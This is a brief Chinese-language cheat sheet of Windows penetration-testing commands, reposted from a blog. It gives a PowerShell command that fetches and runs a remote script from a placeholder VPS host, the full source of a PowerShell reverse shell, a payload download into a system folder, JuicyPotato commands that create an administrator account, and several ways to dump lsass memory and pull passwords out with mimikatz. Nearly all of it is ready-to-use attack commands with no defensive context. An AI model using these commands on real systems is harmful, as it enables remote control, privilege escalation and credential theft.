测试中用到的一些命令

在一片博客上看到的，原地址找不到了
python开启web ：

python3 -m http.server 8000

powershell反弹shell：

powershell IEX (New-Object Net.WebClient).DownloadString('http://www.vps.com:8000/1.ps1');Invoke-lltestTcp

1.ps1文件内容：

function Invoke-lltestTcp

{

$client = New-Object Net.Sockets.TCPClient('vps',port)

$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)

{

$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)

$sendback = (iex $data 2>&1 | Out-String )

$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '

$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)

$stream.Write($sendbyte,0,$sendbyte.Length)

$stream.Flush()

}

$client.Close()

}

powershell下载文件：

$client=new-object System.Net.WebClient

$client.DownloadFile('http://www.vps.com:8000/p1.exe', 'c:\windows\tasks\p1.exe')

查看操作系统版本：

wmic OS get Caption,CSDVersion,OSArchitecture,Version

烂土豆提权添加用户：

./JuicyPotato.exe -p "whoami"

./JuicyPotato.exe -p "net user admin password /add"

./JuicyPotato.exe -p "net localgroup administrators admin /add"

查找rdp端口和进程查看：

tasklist /svc |findstr "Ter"

netstat -ano | findstr "PID"

tasklist /svc

procdump64导出lsass.dmp:

procdump64.exe -accepteula -ma lsass.exe c:\lsass.dmp

SqlDumper.exe导出SQLDmpr0001.mdmp：

tasklist /svc |findstr lsass.exe //查看lsass.exe的pid

"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" pid 0 0x01100

mimikatz解密SQLDmpr0001.mdmp：

sekurlsa::minidump SQLDmpr0001.mdmp

sekurlsa::logonPasswords full

powershell导出lsass.dmp：

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 1316 C:\lsass.dmp full"

mimikatz解密lsass.dmp：

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full